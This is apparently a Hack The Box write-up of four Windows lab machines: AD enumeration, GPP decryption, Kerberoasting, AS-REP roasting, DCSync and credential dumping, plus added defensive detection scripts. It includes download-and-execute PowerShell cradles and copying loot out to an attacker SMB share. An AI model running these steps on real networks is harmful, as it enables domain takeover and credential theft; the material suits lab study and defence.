HTB_Windows_Set_1

  • HTB brought back a few Windows boxes
  • My summer internship is settled
  • The exams in exam week are scheduled late

Good timing.

Active

Port scan

nmap -sV -sT -Pn 10.10.10.100

Nmap scan report for 10.10.10.100
Host is up (0.59s latency).
Not shown: 982 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-04 09:21:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Service
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

Port 53 is open, so this is almost certainly a DC.

enum4linux 10.10.10.100

==========================
| Target Information |
==========================
Target ........... 10.10.10.100
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

------

======================================
| OS information on 10.10.10.100 |
======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.100 from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.10.100 from srvinfo:
10.10.10.100 Wk Sv PDC Tim NT Domain Controller
platform_id : 500
os version : 6.1
server type : 0x80102b

------

=========================================
| Share Enumeration on 10.10.10.100 |
=========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
attacker_folder Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk

Anonymous login should work.

smbmap -H 10.10.10.100

Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
attacker_folder NO ACCESS
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS

Download the whole share

smbclient //10.10.10.100/Replication
mask ""
recurse ON
prompt OFF
mget active.htb

Got the GPP encrypted password (cpassword)

cat active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Decrypt it to recover the plaintext password

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
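The cpassword above is only there because the GPO still carries it. The following is an added example, not code from the writeup or any tool it uses: a small SYSVOL audit that finds every Preferences XML item still holding a cpassword and reports the account, the change date and the ciphertext size, without decrypting anything. The constructed sample is the Groups.xml shown above; the file-walking helper takes any directory (for instance a mirrored Replication share).

```python
"""Audit GPP XML for leftover cpassword attributes (added example, not from the writeup)."""
import base64
import os
import xml.etree.ElementTree as ET

# Constructed sample: the Groups.xml shown above, reused here as offline test input.
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>"""


def normalize_cpassword(cpassword):
    """GPP strips the base64 '=' padding; restore it and return the raw AES-CBC ciphertext."""
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    if len(raw) % 16:
        raise ValueError("cpassword is not a whole number of AES blocks")
    return raw


def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per element that carries a cpassword attribute (no decryption)."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for el in root.iter():
        cp = el.get("cpassword")
        if cp is None:
            continue
        owner = parents.get(el, el)  # the <User>/<Drive>/... item wrapping <Properties>
        findings.append({
            "file": source,
            "item": owner.tag,
            "account": el.get("userName") or owner.get("name"),
            "changed": owner.get("changed"),
            "cipher_len": len(normalize_cpassword(cp)),
        })
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL copy (e.g. the mirrored Replication share) and collect every hit."""
    hits = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name.lower().endswith(".xml"):
                path = os.path.join(dirpath, name)
                try:
                    with open(path, encoding="utf-8-sig") as fh:
                        hits.extend(find_cpasswords(fh.read(), path))
                except (ET.ParseError, ValueError, UnicodeDecodeError):
                    continue  # not Preferences XML, or malformed: skip it
    return hits
```

A 64-byte ciphertext is four AES blocks, which matches a short UTF-16 password; any non-empty result from scan_sysvol means the GPO should be rewritten without the stored password.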

I originally thought I'd get a shell here with evil-winrm or psexec; turns out it's an SMB login to the Users share.

smbclient //10.10.10.100/Users -U active.htb/SVC_TGS%GPPstillStandingStrong2k18
get svc_tgs\desktop\user.txt

cat svc_tgs\\desktop\\user.txt
86d67d8ba232bb6a254aa4d10159e983

Privilege escalation

Kerberoasting

python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile getuserspns.out

(Got a clock-skew-too-great error when running it, annoying)
Sync the time

ntpdate -u 10.10.10.100

Crack the ticket

john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs getuserspns.out 

Ticketmaster1968 (?)

Check SMB share permissions

smbmap -H 10.10.10.100 -u administrator -p Ticketmaster1968

Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
attacker_folder READ, WRITE
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ, WRITE Logon server share
Replication READ ONLY
SYSVOL READ, WRITE Logon server share
Users

We have write access, so straight to psexec

python psexec.py active.htb/administrator@10.10.10.100
Ticketmaster1968

type \users\administrator\desktop\root.txt
b5fc76d1d6b91d77b2fbf2d54d0f708b

Bastion

Port scan

nmap -sV -sT -Pn 10.10.10.134

Nmap scan report for 10.10.10.134
Host is up (0.59s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Exploitation

Enumerate shares with smbmap

smbmap -H 10.10.10.134 -u test
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC

There are two VHD files

smbclient //10.10.10.134/backups

dir WindowsImageBackup\L4mpje-PC\"Backup 2019-02-22 124351"\
. Dn 0 Fri Feb 22 20:45:32 2019
.. Dn 0 Fri Feb 22 20:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 20:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 20:45:32 2019
BackupSpecs.xml An 1186 Fri Feb 22 20:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 20:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 20:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 20:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 20:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 20:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 20:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 20:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 20:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 20:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 20:45:32 2019

7735807 blocks of size 4096. 2757267 blocks available

First mount the SMB share, then attach the VHD as a local block device and mount it

mkdir /tmp/vhd
mkdir /tmp/l4mpje-pc
mount -t cifs //10.10.10.134/backups/WindowsImageBackup/L4mpje-PC /tmp/l4mpje-pc/ -o user=anonymous
modprobe nbd max_part=16
qemu-nbd -r -c /dev/nbd0 "/tmp/l4mpje-pc/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd"
mount -r /dev/nbd0p1 /tmp/vhd

Copy the SAM and SYSTEM hives

cp /tmp/vhd/Windows/System32/config/SYSTEM /root/
cp /tmp/vhd/Windows/System32/config/SAM /root/

Unmount everything

umount /tmp/vhd
qemu-nbd -d /dev/nbd0
rmmod nbd
umount /tmp/l4mpje-pc

Dump the hashes

python secretsdump.py local -system /root/SYSTEM -sam /root/SAM

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...

Crack the NT hash to get the plaintext

john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT hash

bureaulampje (?)

SSH login

ssh L4mpje@10.10.10.134
bureaulampje

type Desktop\user.txt
9bfe57d5c3309db3a151772f9d86c6cd

Privilege escalation

Find mRemoteNG's stored credentials

type \Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml

Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

Recover the administrator password

wget https://raw.githubusercontent.com/kmahyyg/mremoteng-decrypt/master/mremoteng_decrypt.py
python mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

Password: thXLHM96BeKL0ER2

SSH login

ssh administrator@10.10.10.134
thXLHM96BeKL0ER2
type \Users\Administrator\Desktop\root.txt

958850b91811676ed6620a9c430e65c8

Forest

Port scan

nmap -sV -sT -Pn 10.10.10.161

Nmap scan report for 10.10.10.161
Host is up (0.081s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-05 14:34:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

Another DC

Enumeration returns the domain name and a list of usernames

enum4linux 10.10.10.161

===========================================
| Getting domain SID for 10.10.10.161 |
===========================================
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)

-----

=============================
| Users on 10.10.10.161 |
=============================
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

Typically that requires credentials on the domain to authenticate with. There is an option for an account to have the property “Do not require Kerberos preauthentication” or UF_DONT_REQUIRE_PREAUTH set to true. AS-REP Roasting is an attack against Kerberos for these accounts.

https://0xdf.gitlab.io/2020/03/21/htb-forest.html#as-rep-roasting
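The quoted property is a single bit in userAccountControl, so a defender can list the exposed accounts straight from LDAP instead of running GetNPUsers. The block below is an added example, not code from the writeup or from impacket: it parses ldapsearch-style LDIF, decodes the flag bits and returns the accounts that can be AS-REP roasted, and also builds the LDAP filter that asks the DC for that bit directly. The sample LDIF and its flag values are constructed for the example; the writeup only shows that svc-alfresco turned out to be roastable.

```python
"""List accounts exposed to AS-REP roasting (added example, not part of the original writeup)."""
import re

# userAccountControl bits from MS-SAMR; UF_DONT_REQUIRE_PREAUTH is the one the quote above is about.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000
UAC_NAMES = {UF_ACCOUNTDISABLE: "ACCOUNTDISABLE", UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
             UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD", UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH"}

# Filter for ldapsearch / Get-ADUser -LDAPFilter: 1.2.840.113556.1.4.803 is LDAP_MATCHING_RULE_BIT_AND.
ASREP_LDAP_FILTER = ("(&(objectCategory=person)(objectClass=user)"
                     "(userAccountControl:1.2.840.113556.1.4.803:=%d))" % UF_DONT_REQUIRE_PREAUTH)

# Constructed LDIF, as ldapsearch would print it; the flag values are invented for this
# example (the writeup only shows that svc-alfresco turned out to be roastable).
SAMPLE_LDIF = """\
dn: CN=sebastien,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: sebastien
userAccountControl: 66048

dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-alfresco
userAccountControl: 4260352

dn: CN=old-svc,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: old-svc
userAccountControl: 4194818
"""


def parse_ldif(text):
    """Return (sAMAccountName, userAccountControl) per LDIF entry; entries are blank-line separated."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        attrs = dict(line.split(": ", 1) for line in block.splitlines() if ": " in line)
        if "sAMAccountName" in attrs and "userAccountControl" in attrs:
            entries.append((attrs["sAMAccountName"], int(attrs["userAccountControl"])))
    return entries


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value."""
    return [name for bit, name in UAC_NAMES.items() if value & bit]


def asrep_roastable(accounts):
    """Accounts with pre-auth disabled; disabled accounts are skipped since the KDC refuses them anyway."""
    return [sam for sam, uac in accounts
            if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE]
```

Accounts that asrep_roastable returns should either get the flag cleared or be given a long random password, since their AS-REP can be requested by anyone who knows the name.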

AS-REP Roasting

python GetNPUsers.py HTB/svc-alfresco -request -no-pass -dc-ip 10.10.10.161
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:74aacc88dcebdc99fbdfad38ea7bfb86$0f390178e508b52f3547f4784f435ca5955e6086b719aab1723ec0d13c900d4b0b7e4a00c10162b5615fb8c93e90f34a1746b5de60400cac0a2eae9ecab1a1d16f1d41958d72811ba73835e3177ea538e77888a207a47537c83644879fa792b5d31b965dd75aef7409dc34ba0b2df67eb987db6779846f330d563277f97e004484f67e7a853beec8e7552b427ac4c43fabd3f523a365f80a43f90f587ee08bbc8d06ad907d9efc5a6541714f92fe3c7626dd539daa45d54a4ef5733579277c65f7d11ca380184131a767428ca62077e4553fd8d86d1e7340da4b41b115357485

Crack the password

john --wordlist=/usr/share/wordlists/rockyou.txt hash

s3rvice ($krb5asrep$23$svc-alfresco@HTB)

Log in with evil-winrm

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
type C:\users\svc-alfresco\desktop\user.txt

e5e4e47ae7022664cda6eb013fb0d9ed

Privilege escalation

Download the PowerShell version of the BloodHound collector and start an HTTP server and an SMB server (impacket)

wget https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
python -m http.server 9998&
python smbserver.py Bufferfly . -smb2support -username Buffer -password fly&

On the target, download the BloodHound collector and send the output file back

iex(new-object net.webclient).downloadstring("http://10.10.16.11:9998/PowerView.ps1")
iex(new-object net.webclient).downloadstring("http://10.10.16.11:9998/SharpHound.ps1")
powershell -exec bypass
invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
net use \\10.10.16.11\Bufferfly /u:Buffer fly
copy 20210705223815_BloodHound.zip \\10.10.16.11\Bufferfly\
net use /d \\10.10.16.11\Bufferfly

I really couldn't make sense of the BloodHound output, so I read a walkthrough.
The rough idea is:

  1. User "svc-alfresco" has Account Operators rights and can create domain accounts
  2. User "svc-alfresco" has full control (GenericAll) over the "Exchange Windows Permissions" group, so "svc-alfresco" can be added to "Exchange Windows Permissions"
  3. The "Exchange Windows Permissions" group can modify the ACL on domain users (WriteDacl)
  4. User "svc-alfresco" uses the "Exchange Windows Permissions" group's rights to grant "DCSync" rights
  5. Use that domain account to run a DCSync attack
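Step 5 is the part a SOC can actually see: a DCSync is a replication request on the domain object made by something that is not a domain controller. The block below is an added example, not code from the writeup or BloodHound: detection logic over constructed Security event 4662 records (field names follow the 4662 event XML, values are made up) that flags control-access requests carrying the replication extended rights when the subject is not an allow-listed DC computer account. FOREST$ as the default DC account is an assumption taken from the nmap hostname above; the event only exists if the Directory Service Access audit subcategory is enabled on the DCs.

```python
"""Spot DCSync-style replication requests in Security event 4662 (added example, not from the writeup)."""
import re

# Extended rights a DCSync needs (schema GUIDs). Seeing them requested by anything
# other than a domain controller's own account is the signal.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS, the AccessMask used for extended rights


def replication_rights_in(properties):
    """Translate the GUIDs in a 4662 'Properties' field into the replication rights they denote."""
    names = [REPLICATION_RIGHTS.get(g.lower()) for g in GUID_RE.findall(properties)]
    return [n for n in names if n]


def is_dcsync(event, dc_accounts):
    """4662 + control access + replication GUIDs, from a principal that is not a known DC account."""
    if event.get("EventID") != 4662:
        return False
    if not int(event.get("AccessMask", "0"), 16) & CONTROL_ACCESS:
        return False
    if event.get("SubjectUserName", "").upper() in dc_accounts:
        return False  # DC-to-DC replication is business as usual
    return bool(replication_rights_in(event.get("Properties", "")))


def find_dcsync(events, dc_accounts=("FOREST$",)):
    """Return (DOMAIN\\user, [rights]) per suspicious event. dc_accounts is the allow-list of
    DC computer accounts; FOREST$ is assumed from the nmap hostname (constructed default)."""
    dcs = {a.upper() for a in dc_accounts}
    return [("%s\\%s" % (e["SubjectDomainName"], e["SubjectUserName"]),
             replication_rights_in(e["Properties"]))
            for e in events if is_dcsync(e, dcs)]


# Constructed sample records (field names follow the 4662 event XML; values are made up).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "HTB", "SubjectUserName": "FOREST$", "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectDomainName": "HTB", "SubjectUserName": "bufferfly", "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectDomainName": "HTB", "SubjectUserName": "lucinda", "AccessMask": "0x10",
     "Properties": "Read Property {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
]
```

The same allow-list idea applies to Azure AD Connect or backup service accounts that legitimately replicate; anything else returned by find_dcsync deserves an immediate look at who granted it the rights.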

Add a domain user

net user bufferfly bufferfly /add /domain

After running the command, get a new shell

Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members svc-alfresco

Check group membership

whoami /groups

HTB\Exchange Windows Permissions Group S-1-5-21-3072663084-364016917-1341370565-1121 Mandatory group, Enabled by default, Enabled group
HTB\Exchange Trusted Subsystem Group S-1-5-21-3072663084-364016917-1341370565-1119 Mandatory group, Enabled by default, Enabled grou

Grant DCSync rights (PowerView.ps1)

Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity bufferfly -Rights DCSync

DCSync attack

python secretsdump.py -just-dc "htb/bufferfly:bufferfly@10.10.10.161"

htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

Log in with the hash

evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
type c:\users\administrator\desktop\root.txt

f048153f202bbb2f82622b04d79129cc

It seems svc-alfresco isn't a domain user, while the DCSync step needs a domain user's credentials.

PowerShell seems to load functions from the ps1 files automatically when running commands, which is convenient.


Heist

Port scan

nmap -sV -sT -Pn 10.10.10.149

Nmap scan report for 10.10.10.149
Host is up (0.24s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

Visit http://10.10.10.149/attachments/config.txt

It gives a few accounts

rout3r:$uperP@ssword
admin:Q4)sJu\Y8qz*A3?d
secret:stealth1agent

Test hazard's password (for some unknown reason hydra can't brute-force SMB)

smbmap -H 10.10.10.149 -u hazard -p stealth1agent

Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC

Enumerate the domain accounts

python lookupsid.py hazard:stealth1agent@heist

500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

Wordlists

cat user

hazard
administrator
admin
rout3r
admin
secret
support
Chase
------
cat pass

$uperP@ssword
Q4)sJu\Y8qz*A3?d
stealth1agent

Brute-force WinRM

crackmapexec winrm 10.10.10.149 -d heist -u user -p pass

WINRM 10.10.10.149 5985 10.10.10.149 [+] heist\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)

WinRM login

evil-winrm -i 10.10.10.149 -u chase -p "Q4)sJu\Y8qz*A3?d"
type c:\users\chase\desktop\user.txt

a127daef77ab6d9d92008653295f59c4

Privilege escalation

List processes

ps

378 28 25008 62440 1.16 6216 1 firefox
355 25 16444 38908 0.27 6564 1 firefox
1050 73 172600 248916 13.88 6732 1 firefox
347 19 9972 34476 0.23 6844 1 firefox
401 34 40728 101244 3.31 6956 1 firefox

Worth looking at the firefox process memory

Start the HTTP and SMB servers

python -m http.server 9998&
python smbserver.py Bufferfly . -smb2support -username Buffer -password fly&

Upload procdump and send the firefox process memory dump back

wget -uri http://10.10.16.14:9998/procdump64.exe -outfile procdump64.exe
./procdump64.exe -accepteula -ma 6216
net use \\10.10.16.14\Bufferfly /u:Buffer fly
copy firefox.exe_210706_221007.dmp \\10.10.16.14\Bufferfly\
net use /d \\10.10.16.14\Bufferfly

Search the dump for admin-related strings

grep -a admin firefox.exe_210706_221007.dmp

localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ

WinRM login

evil-winrm -i 10.10.10.149 -u administrator -p '4dD!5}x/re8]FBuZ'
type c:\users\administrator\desktop\root.txt

50dfa3c6bfd20e2e0d071b073d766897

Still haven't figured out why hydra can't brute-force SMB; I'll try again when I get the chance.
